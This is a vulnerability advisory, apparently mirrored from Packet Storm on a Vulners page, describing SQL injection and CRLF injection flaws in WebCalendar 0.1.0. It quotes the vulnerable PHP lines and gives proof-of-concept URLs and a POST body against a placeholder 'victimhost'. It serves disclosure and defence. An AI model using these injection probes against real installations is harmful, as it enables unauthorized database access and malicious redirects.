Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

webCalSQL.txt

🗓️ 02 Dec 2005 00:00:00Reported by lwangType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

WebCalendar has SQL and CRLF Injection vulnerabilities in multiple PHP scripts allowing exploitation.

Code
`WebCalendar Multiple Vulnerabilities.  
  
Author: lwang (lwang at lwang.org)  
  
Publish Date: 2005-12-1  
  
Description:  
WebCalendar is a PHP application used to maintain a calendar for one or more persons and for a variety of purposes.   
In WebCalendar 0.1.0, activity_log.php and edit_report_handler.php are prone to SQL Injection attack, layers_toggle.php is vulnerable to CRLF Injection.  
  
Reference:   
http://vd.lwang.org/webcalendar_multiple_vulns.txt  
  
Vulnerability Analysis and Proof of Concept:  
1. SQL Injection  
in activity_log.php, parameter $startid does not validation.  
if ( ! empty ( $startid ) )  
$sql .= "AND webcal_entry_log.cal_log_id <= $startid ";  
PoC:  
http://victimhost/webcalendar/activity_log.php?startid=%2527  
http://victimhost/webcalendar/activity_log.php?startid=%27  
http://victimhost/webcalendar/activity_log.php?startid='  
  
in edit_report_handler.php  
PoC:  
POST the following variable to http://victimhost/webcalendar/edit_report_handler.php  
report_name=Unnamed%20Report&is_global=Y&show_in_trailer=Y&include_header=Y&time_range='&cat_id=1&allow_nav=Y&include_empty=Y&page_template=%26lt%3Bdl%26gt%3B%24%7Bdays%7D%26lt%3B%2Fdl%26gt%3B&day_template=%26lt%3Bdt%26gt%3B%26lt%3Bb%26gt%3B%24%7Bdate%7D%26lt%3B%2Fb%26gt%3B%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bdl%26gt%3B%24%7Bevents%7D%26lt%3B%2Fdl%26gt%3B%26lt%3B%2Fdd%26gt%3B&event_template=%26lt%3Bdt%26gt%3B%24%7Bname%7D%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bb%26gt%3BDate%3A%26lt%3B%2Fb%26gt%3B%20%24%7Bdate%7D%26lt%3Bbr%20%2F%26gt%3B%0A%26lt%3Bb%26gt%3BTime%3A%26lt%3B%2Fb%26gt%3B%20%24%7Btime%7D%26lt%3Bbr%20%2F%26gt%3B%0A%24%7Bdescription%7D%26lt%3B%2Fdd%26gt%3B  
  
2. CRLF Injection  
in layers_toggle.php, parameter $ret does not validation.  
if ( empty ( $error ) ) {  
// Go back to where we where if we can figure it out.  
if ( strlen ( $ret ) )  
do_redirect ( $ret );  
else if ( ! empty ( $HTTP_REFERER ) )  
do_redirect ( $HTTP_REFERER );  
else  
send_to_preferred_view ();  
  
PoC:  
http://victimhost/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to]  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Dec 2005 00:00Current
7.4High risk
Vulners AI Score7.4
webcalendar vulnerabilities sql injection crlf injection php application
22